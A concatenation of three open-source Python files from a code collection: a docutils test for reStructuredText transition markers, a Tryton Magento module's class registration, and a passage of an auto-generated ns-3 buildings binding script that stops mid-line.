#! /usr/bin/env python # $Id: test_transitions.py 4564 2006-05-21 20:44:42Z wiemann $ # Author: David Goodger <goodger@python.org> # Copyright: This module has been placed in the public domain. """ Tests for transition markers. """ from __init__ import DocutilsTestSupport def suite(): s = DocutilsTestSupport.ParserTestSuite() s.generateTests(totest) return s totest = {} # See DocutilsTestSupport.ParserTestSuite.generateTests for a # description of the 'totest' data structure. totest['transitions'] = [ ["""\ Test transition markers. -------- Paragraph """, """\ <document source="test data"> <paragraph> Test transition markers. <transition> <paragraph> Paragraph """], ["""\ Section 1 ========= First text division of section 1. -------- Second text division of section 1. Section 2 --------- Paragraph 2 in section 2. """, """\ <document source="test data"> <section ids="section-1" names="section\ 1"> <title> Section 1 <paragraph> First text division of section 1. <transition> <paragraph> Second text division of section 1. <section ids="section-2" names="section\ 2"> <title> Section 2 <paragraph> Paragraph 2 in section 2. """], ["""\ -------- A section or document may not begin with a transition. The DTD specifies that two transitions may not be adjacent: -------- -------- -------- The DTD also specifies that a section or document may not end with a transition. -------- """, """\ <document source="test data"> <transition> <paragraph> A section or document may not begin with a transition. <paragraph> The DTD specifies that two transitions may not be adjacent: <transition> <transition> <transition> <paragraph> The DTD also specifies that a section or document may not end with a transition. <transition> """], ["""\ Test unexpected transition markers. Block quote. -------- Paragraph. """, """\ <document source="test data"> <paragraph> Test unexpected transition markers. <block_quote> <paragraph> Block quote. <system_message level="4" line="5" source="test data" type="SEVERE"> <paragraph> Unexpected section title or transition. <literal_block xml:space="preserve"> -------- <paragraph> Paragraph. """], ["""\ Short transition marker. --- Paragraph """, """\ <document source="test data"> <paragraph> Short transition marker. <paragraph> --- <paragraph> Paragraph """], ["""\ Sections with transitions at beginning and end. Section 1 ========= ---------- The next transition is legal: ---------- Section 2 ========= ---------- """, """\ <document source="test data"> <paragraph> Sections with transitions at beginning and end. <section ids="section-1" names="section\ 1"> <title> Section 1 <transition> <paragraph> The next transition is legal: <transition> <section ids="section-2" names="section\ 2"> <title> Section 2 <transition> """], ["""\ A paragraph, two transitions, and a blank line. ---------- ---------- """, """\ <document source="test data"> <paragraph> A paragraph, two transitions, and a blank line. <transition> <transition> """], ["""\ A paragraph and two transitions. ---------- ---------- """, # the same: """\ <document source="test data"> <paragraph> A paragraph and two transitions. <transition> <transition> """], ["""\ ---------- Document beginning with a transition. """, """\ <document source="test data"> <transition> <paragraph> Document beginning with a transition. """], ["""\ Section 1 ========= Subsection 1 ------------ Some text. ---------- Section 2 ========= Some text. """, """\ <document source="test data"> <section ids="section-1" names="section\ 1"> <title> Section 1 <section ids="subsection-1" names="subsection\ 1"> <title> Subsection 1 <paragraph> Some text. <transition> <section ids="section-2" names="section\ 2"> <title> Section 2 <paragraph> Some text. """], ["""\ Section 1 ========= ---------- ---------- ---------- Section 2 ========= Some text. """, """\ <document source="test data"> <section ids="section-1" names="section\ 1"> <title> Section 1 <transition> <transition> <transition> <section ids="section-2" names="section\ 2"> <title> Section 2 <paragraph> Some text. """], ["""\ ---------- ---------- ---------- """, """\ <document source="test data"> <transition> <transition> <transition> """], ["""\ A paragraph. ---------- """, """\ <document source="test data"> <paragraph> A paragraph. <transition> """], ] if __name__ == '__main__': import unittest unittest.main(defaultTest='suite')
agpl-3.0
tarunbhardwaj/trytond-magento
__init__.py
3
1806
# -*- coding: utf-8 -*- from trytond.pool import Pool from wizard import ( TestMagentoConnectionStart, ImportWebsitesStart, ExportMagentoShipmentStatusStart, ExportMagentoShipmentStatus, ConfigureMagento, ImportStoresStart, FailureStart, UpdateMagentoCatalogStart, UpdateMagentoCatalog, SuccessStart, ExportDataWizardConfigure, ExportDataWizard, ) from channel import Channel, MagentoTier from party import Party, MagentoWebsiteParty, Address from product import ( Category, MagentoInstanceCategory, Product, ProductPriceTier, ProductSaleChannelListing ) from country import Country, Subdivision from currency import Currency from carrier import SaleChannelCarrier from sale import ( Sale, StockShipmentOut, SaleLine ) from bom import BOM from payment import MagentoPaymentGateway, Payment def register(): """ Register classes """ Pool.register( Channel, MagentoTier, TestMagentoConnectionStart, ImportStoresStart, FailureStart, SuccessStart, ImportWebsitesStart, UpdateMagentoCatalogStart, ExportMagentoShipmentStatusStart, Country, Subdivision, Party, MagentoWebsiteParty, Category, MagentoInstanceCategory, Product, ProductPriceTier, ExportDataWizardConfigure, StockShipmentOut, Address, Currency, Sale, SaleChannelCarrier, SaleLine, BOM, ProductSaleChannelListing, MagentoPaymentGateway, Payment, module='magento', type_='model' ) Pool.register( ExportMagentoShipmentStatus, ExportDataWizard, ConfigureMagento, UpdateMagentoCatalog, module='magento', type_='wizard' )
bsd-3-clause
xinhunbie/NS3-
src/buildings/bindings/modulegen__gcc_ILP32.py
38
318633
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers import pybindgen.settings import warnings class ErrorHandler(pybindgen.settings.ErrorHandler): def handle_error(self, wrapper, exception, traceback_): warnings.warn("exception %r in wrapper %s" % (exception, wrapper)) return True pybindgen.settings.error_handler = ErrorHandler() import sys def module_init(): root_module = Module('ns.buildings', cpp_namespace='::ns3') return root_module def register_types(module): root_module = module.get_root() ## propagation-environment.h (module 'propagation'): ns3::CitySize [enumeration] module.add_enum('CitySize', ['SmallCity', 'MediumCity', 'LargeCity'], import_from_module='ns.propagation') ## propagation-environment.h (module 'propagation'): ns3::EnvironmentType [enumeration] module.add_enum('EnvironmentType', ['UrbanEnvironment', 'SubUrbanEnvironment', 'OpenAreasEnvironment'], import_from_module='ns.propagation') ## address.h (module 'network'): ns3::Address [class] module.add_class('Address', import_from_module='ns.network') ## address.h (module 'network'): ns3::Address::MaxSize_e [enumeration] module.add_enum('MaxSize_e', ['MAX_SIZE'], outer_class=root_module['ns3::Address'], import_from_module='ns.network') ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class] module.add_class('AttributeConstructionList', import_from_module='ns.core') ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct] module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList']) ## box.h (module 'mobility'): ns3::Box [class] module.add_class('Box', import_from_module='ns.mobility') ## box.h (module 'mobility'): ns3::Box::Side [enumeration] module.add_enum('Side', ['RIGHT', 'LEFT', 'TOP', 'BOTTOM', 'UP', 'DOWN'], outer_class=root_module['ns3::Box'], import_from_module='ns.mobility') ## building-container.h (module 'buildings'): ns3::BuildingContainer [class] module.add_class('BuildingContainer') ## building-list.h (module 'buildings'): ns3::BuildingList [class] module.add_class('BuildingList') ## buildings-helper.h (module 'buildings'): ns3::BuildingsHelper [class] module.add_class('BuildingsHelper') ## callback.h (module 'core'): ns3::CallbackBase [class] module.add_class('CallbackBase', import_from_module='ns.core') ## constant-velocity-helper.h (module 'mobility'): ns3::ConstantVelocityHelper [class] module.add_class('ConstantVelocityHelper', import_from_module='ns.mobility') ## hash.h (module 'core'): ns3::Hasher [class] module.add_class('Hasher', import_from_module='ns.core') ## ipv4-address.h (module 'network'): ns3::Ipv4Address [class] module.add_class('Ipv4Address', import_from_module='ns.network') ## ipv4-address.h (module 'network'): ns3::Ipv4Address [class] root_module['ns3::Ipv4Address'].implicitly_converts_to(root_module['ns3::Address']) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask [class] module.add_class('Ipv4Mask', import_from_module='ns.network') ## ipv6-address.h (module 'network'): ns3::Ipv6Address [class] module.add_class('Ipv6Address', import_from_module='ns.network') ## ipv6-address.h (module 'network'): ns3::Ipv6Address [class] root_module['ns3::Ipv6Address'].implicitly_converts_to(root_module['ns3::Address']) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix [class] module.add_class('Ipv6Prefix', import_from_module='ns.network') ## node-container.h (module 'network'): ns3::NodeContainer [class] module.add_class('NodeContainer', import_from_module='ns.network') ## object-base.h (module 'core'): ns3::ObjectBase [class] module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core') ## object.h (module 'core'): ns3::ObjectDeleter [struct] module.add_class('ObjectDeleter', import_from_module='ns.core') ## object-factory.h (module 'core'): ns3::ObjectFactory [class] module.add_class('ObjectFactory', import_from_module='ns.core') ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## tag-buffer.h (module 'network'): ns3::TagBuffer [class] module.add_class('TagBuffer', import_from_module='ns.network') ## nstime.h (module 'core'): ns3::TimeWithUnit [class] module.add_class('TimeWithUnit', import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId [class] module.add_class('TypeId', import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration] module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId::SupportLevel [enumeration] module.add_enum('SupportLevel', ['SUPPORTED', 'DEPRECATED', 'OBSOLETE'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct] module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId']) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct] module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId']) ## vector.h (module 'core'): ns3::Vector2D [class] module.add_class('Vector2D', import_from_module='ns.core') ## vector.h (module 'core'): ns3::Vector3D [class] module.add_class('Vector3D', import_from_module='ns.core') ## empty.h (module 'core'): ns3::empty [class] module.add_class('empty', import_from_module='ns.core') ## int64x64-double.h (module 'core'): ns3::int64x64_t [class] module.add_class('int64x64_t', import_from_module='ns.core') ## int64x64-double.h (module 'core'): ns3::int64x64_t::impl_type [enumeration] module.add_enum('impl_type', ['int128_impl', 'cairo_impl', 'ld_impl'], outer_class=root_module['ns3::int64x64_t'], import_from_module='ns.core') ## object.h (module 'core'): ns3::Object [class] module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >']) ## object.h (module 'core'): ns3::Object::AggregateIterator [class] module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object']) ## position-allocator.h (module 'mobility'): ns3::PositionAllocator [class] module.add_class('PositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::Object']) ## propagation-loss-model.h (module 'propagation'): ns3::PropagationLossModel [class] module.add_class('PropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::Object']) ## position-allocator.h (module 'mobility'): ns3::RandomBoxPositionAllocator [class] module.add_class('RandomBoxPositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::PositionAllocator']) ## building-position-allocator.h (module 'buildings'): ns3::RandomBuildingPositionAllocator [class] module.add_class('RandomBuildingPositionAllocator', parent=root_module['ns3::PositionAllocator']) ## position-allocator.h (module 'mobility'): ns3::RandomDiscPositionAllocator [class] module.add_class('RandomDiscPositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::PositionAllocator']) ## propagation-loss-model.h (module 'propagation'): ns3::RandomPropagationLossModel [class] module.add_class('RandomPropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## position-allocator.h (module 'mobility'): ns3::RandomRectanglePositionAllocator [class] module.add_class('RandomRectanglePositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::PositionAllocator']) ## building-position-allocator.h (module 'buildings'): ns3::RandomRoomPositionAllocator [class] module.add_class('RandomRoomPositionAllocator', parent=root_module['ns3::PositionAllocator']) ## random-variable-stream.h (module 'core'): ns3::RandomVariableStream [class] module.add_class('RandomVariableStream', import_from_module='ns.core', parent=root_module['ns3::Object']) ## propagation-loss-model.h (module 'propagation'): ns3::RangePropagationLossModel [class] module.add_class('RangePropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## building-position-allocator.h (module 'buildings'): ns3::SameRoomPositionAllocator [class] module.add_class('SameRoomPositionAllocator', parent=root_module['ns3::PositionAllocator']) ## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable [class] module.add_class('SequentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Hash::Implementation', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Hash::Implementation>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::NetDeviceQueue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::NetDeviceQueue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::QueueItem', 'ns3::empty', 'ns3::DefaultDeleter<ns3::QueueItem>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## propagation-loss-model.h (module 'propagation'): ns3::ThreeLogDistancePropagationLossModel [class] module.add_class('ThreeLogDistancePropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## nstime.h (module 'core'): ns3::Time [class] module.add_class('Time', import_from_module='ns.core') ## nstime.h (module 'core'): ns3::Time::Unit [enumeration] module.add_enum('Unit', ['Y', 'D', 'H', 'MIN', 'S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core') ## nstime.h (module 'core'): ns3::Time [class] root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t']) ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class] module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >']) ## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable [class] module.add_class('TriangularRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## propagation-loss-model.h (module 'propagation'): ns3::TwoRayGroundPropagationLossModel [class] module.add_class('TwoRayGroundPropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## position-allocator.h (module 'mobility'): ns3::UniformDiscPositionAllocator [class] module.add_class('UniformDiscPositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::PositionAllocator']) ## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable [class] module.add_class('UniformRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable [class] module.add_class('WeibullRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable [class] module.add_class('ZetaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable [class] module.add_class('ZipfRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## attribute.h (module 'core'): ns3::AttributeAccessor [class] module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >']) ## attribute.h (module 'core'): ns3::AttributeChecker [class] module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >']) ## attribute.h (module 'core'): ns3::AttributeValue [class] module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >']) ## box.h (module 'mobility'): ns3::BoxChecker [class] module.add_class('BoxChecker', import_from_module='ns.mobility', parent=root_module['ns3::AttributeChecker']) ## box.h (module 'mobility'): ns3::BoxValue [class] module.add_class('BoxValue', import_from_module='ns.mobility', parent=root_module['ns3::AttributeValue']) ## building.h (module 'buildings'): ns3::Building [class] module.add_class('Building', parent=root_module['ns3::Object']) ## building.h (module 'buildings'): ns3::Building::BuildingType_t [enumeration] module.add_enum('BuildingType_t', ['Residential', 'Office', 'Commercial'], outer_class=root_module['ns3::Building']) ## building.h (module 'buildings'): ns3::Building::ExtWallsType_t [enumeration] module.add_enum('ExtWallsType_t', ['Wood', 'ConcreteWithWindows', 'ConcreteWithoutWindows', 'StoneBlocks'], outer_class=root_module['ns3::Building']) ## buildings-propagation-loss-model.h (module 'buildings'): ns3::BuildingsPropagationLossModel [class] module.add_class('BuildingsPropagationLossModel', parent=root_module['ns3::PropagationLossModel']) ## callback.h (module 'core'): ns3::CallbackChecker [class] module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## callback.h (module 'core'): ns3::CallbackImplBase [class] module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >']) ## callback.h (module 'core'): ns3::CallbackValue [class] module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable [class] module.add_class('ConstantRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable [class] module.add_class('DeterministicRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable [class] module.add_class('EmpiricalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## attribute.h (module 'core'): ns3::EmptyAttributeAccessor [class] module.add_class('EmptyAttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::AttributeAccessor']) ## attribute.h (module 'core'): ns3::EmptyAttributeChecker [class] module.add_class('EmptyAttributeChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## attribute.h (module 'core'): ns3::EmptyAttributeValue [class] module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable [class] module.add_class('ErlangRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable [class] module.add_class('ExponentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## building-position-allocator.h (module 'buildings'): ns3::FixedRoomPositionAllocator [class] module.add_class('FixedRoomPositionAllocator', parent=root_module['ns3::PositionAllocator']) ## propagation-loss-model.h (module 'propagation'): ns3::FixedRssLossModel [class] module.add_class('FixedRssLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## propagation-loss-model.h (module 'propagation'): ns3::FriisPropagationLossModel [class] module.add_class('FriisPropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable [class] module.add_class('GammaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## building-allocator.h (module 'buildings'): ns3::GridBuildingAllocator [class] module.add_class('GridBuildingAllocator', parent=root_module['ns3::Object']) ## position-allocator.h (module 'mobility'): ns3::GridPositionAllocator [class] module.add_class('GridPositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::PositionAllocator']) ## position-allocator.h (module 'mobility'): ns3::GridPositionAllocator::LayoutType [enumeration] module.add_enum('LayoutType', ['ROW_FIRST', 'COLUMN_FIRST'], outer_class=root_module['ns3::GridPositionAllocator'], import_from_module='ns.mobility') ## hybrid-buildings-propagation-loss-model.h (module 'buildings'): ns3::HybridBuildingsPropagationLossModel [class] module.add_class('HybridBuildingsPropagationLossModel', parent=root_module['ns3::BuildingsPropagationLossModel']) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker [class] module.add_class('Ipv4AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue [class] module.add_class('Ipv4AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker [class] module.add_class('Ipv4MaskChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue [class] module.add_class('Ipv4MaskValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker [class] module.add_class('Ipv6AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue [class] module.add_class('Ipv6AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker [class] module.add_class('Ipv6PrefixChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue [class] module.add_class('Ipv6PrefixValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## itu-r-1238-propagation-loss-model.h (module 'buildings'): ns3::ItuR1238PropagationLossModel [class] module.add_class('ItuR1238PropagationLossModel', parent=root_module['ns3::PropagationLossModel']) ## position-allocator.h (module 'mobility'): ns3::ListPositionAllocator [class] module.add_class('ListPositionAllocator', import_from_module='ns.mobility', parent=root_module['ns3::PositionAllocator']) ## propagation-loss-model.h (module 'propagation'): ns3::LogDistancePropagationLossModel [class] module.add_class('LogDistancePropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable [class] module.add_class('LogNormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## propagation-loss-model.h (module 'propagation'): ns3::MatrixPropagationLossModel [class] module.add_class('MatrixPropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## mobility-building-info.h (module 'buildings'): ns3::MobilityBuildingInfo [class] module.add_class('MobilityBuildingInfo', parent=root_module['ns3::Object']) ## propagation-loss-model.h (module 'propagation'): ns3::NakagamiPropagationLossModel [class] module.add_class('NakagamiPropagationLossModel', import_from_module='ns.propagation', parent=root_module['ns3::PropagationLossModel']) ## net-device.h (module 'network'): ns3::NetDevice [class] module.add_class('NetDevice', import_from_module='ns.network', parent=root_module['ns3::Object']) ## net-device.h (module 'network'): ns3::NetDevice::PacketType [enumeration] module.add_enum('PacketType', ['PACKET_HOST', 'NS3_PACKET_HOST', 'PACKET_BROADCAST', 'NS3_PACKET_BROADCAST', 'PACKET_MULTICAST', 'NS3_PACKET_MULTICAST', 'PACKET_OTHERHOST', 'NS3_PACKET_OTHERHOST'], outer_class=root_module['ns3::NetDevice'], import_from_module='ns.network') ## net-device.h (module 'network'): ns3::NetDeviceQueue [class] module.add_class('NetDeviceQueue', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >']) ## net-device.h (module 'network'): ns3::NetDeviceQueueInterface [class] module.add_class('NetDeviceQueueInterface', import_from_module='ns.network', parent=root_module['ns3::Object']) ## node.h (module 'network'): ns3::Node [class] module.add_class('Node', import_from_module='ns.network', parent=root_module['ns3::Object']) ## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable [class] module.add_class('NormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker [class] module.add_class('ObjectFactoryChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## object-factory.h (module 'core'): ns3::ObjectFactoryValue [class] module.add_class('ObjectFactoryValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## oh-buildings-propagation-loss-model.h (module 'buildings'): ns3::OhBuildingsPropagationLossModel [class] module.add_class('OhBuildingsPropagationLossModel', parent=root_module['ns3::BuildingsPropagationLossModel']) ## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable [class] module.add_class('ParetoRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## net-device.h (module 'network'): ns3::QueueItem [class] module.add_class('QueueItem', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >']) ## net-device.h (module 'network'): ns3::QueueItem::Uint8Values [enumeration] module.add_enum('Uint8Values', ['IP_DSFIELD'], outer_class=root_module['ns3::QueueItem'], import_from_module='ns.network') ## nstime.h (module 'core'): ns3::TimeValue [class] module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## type-id.h (module 'core'): ns3::TypeIdChecker [class] module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## type-id.h (module 'core'): ns3::TypeIdValue [class] module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## vector.h (module 'core'): ns3::Vector2DChecker [class] module.add_class('Vector2DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## vector.h (module 'core'): ns3::Vector2DValue [class] module.add_class('Vector2DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## vector.h (module 'core'): ns3::Vector3DChecker [class] module.add_class('Vector3DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## vector.h (module 'core'): ns3::Vector3DValue [class] module.add_class('Vector3DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## address.h (module 'network'): ns3::AddressChecker [class] module.add_class('AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## address.h (module 'network'): 